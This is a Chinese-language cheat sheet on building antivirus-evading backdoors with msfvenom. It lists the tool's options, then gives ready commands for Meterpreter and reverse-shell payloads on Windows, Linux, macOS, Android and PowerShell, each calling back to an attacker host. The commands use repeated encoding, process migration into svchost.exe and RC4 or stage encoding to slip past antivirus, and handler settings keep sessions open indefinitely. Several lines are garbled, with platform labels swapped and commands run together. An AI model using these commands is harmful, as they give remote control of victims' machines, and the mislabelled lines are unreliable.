使用msfvenom生成免杀后门

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 
-l, –list [module_type] 列出指定模块的所有可用资源.模块类型包括:payloads, encoders, nops, all
-n, –nopsled < length> 为payload预先指定一个NOP滑动长度
-f,–format < format>指定输出格式(使用–help-formats来获取msf支持的输出格式列表)
-e, –encoder [encoder]指定需要使用的encoder（编码器,指定需要使用的编码，如果既没用-e选项也没用-b选项，则输出raw payload
-a, –a rch < architecture>指定payload的目标架构，例如 x86 | x64 | x86_64 – platform < platform> 指定 payload的目标平台
-s, –space < length> 设定有效攻击荷载的最大长度，就是文件大小
-b, –bad-chars < list>设定规避字符集，指定需要过滤的坏字符例如：不使用'x0f'、'x00';
-i, –iterations < count>指定 payload的编码次数
-c, –add-code < path>指定一个附加的 win32 shellcode文件
-x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
-k, –keep保护模板程序的动作，注入的 payload 作为一个新的进程运行 –payload-options 列举payload的标准选项
-o, –out < path>指定创建好的payload的存放位置
-v, –var-name < name> 指定一个自定义的变量，以确定输出格式 –shellest 最小化生成 payload
-h, –help 查看帮助选项 –help-formats 查看msf 支持的输出格式列表

//可以在接收到seesion后继续监听端口，保持侦听。msf exploit(multi/handler) >  set ExitOnSession falsemsf5 exploit(multi/handler) > set SessionCommunicationTimeout 0//默认情况下，如果一个会话将在5分钟（300秒）没有任何活动，那么它会被杀死,为防止此情况可将此项修改为0msf5 exploit(multi/handler) > set SessionExpirationTimeout 0//默认情况下，一个星期（604800秒）后，会话将被强制关闭,修改为0可永久不会被关闭

msf exploit(multi/handler) > exploit -j -z

msf5 > handler -H xxx.xxx.xx.x -P xxxx -p windows/meterpreter/reverse_tcp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xxx.xx.xx LPORT=xxxx -e x86/shikata_ga_nai -b"x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe
//这里⽣成的shell程序执⾏后会启动两个进程shell.exe和svchost.exe，关闭其中⼀个不会影响会话状态。

//payload
msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=xxxx -f c

msf exploit (multi/handler) > set= EnableStageEncoding true//尝试使用不同的编码器对stage进行编码，可能绕过部分杀软的查杀EnableStageEncoding => true
msf exploit (multi/handler) > set stageencoder x86/fnstenv_mov Stageencoder => x64/xor
msf exploit (multi/handler) > set stageencodingfallback falsestageencodingfallback => false

msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=xxx.xxx.xxx.xxx lport=xxxx RC4PASSWORD=tidesec -f c

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xx LPORT=xxxx -a x86 --platform Windows -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xx.xxx.xx LPORT=xxxx -f exe > shell.exe

msfvenom -plinux/x86/meterpreter/reverse_tcp LHOST=xx.xxx.xxx.xxx LPORT=xxxx -ax86 --platform Linux -f elf > shell.elf

msfvenom -posx/x86/shell_reverse_tcp LHOST=xxx.xxx.xxx.xLPORT=xxxx -ax86 --platform osx -f macho > shell.macho

msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -f raw > shell.apkmsfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx R > test.apk

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

//linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -a x86 --platform Windows -f c
//windowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -a x86 --platform Linux -f c
//macmsfvenom -p osx/x86/shell_reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -a x86 --platform osx -f c

use exploit/multi/handler set PAYLOAD <Payload name>set LHOST xx.xx.xx.xxset LPORT xxxxset ExitOnSession falseexploit -j -z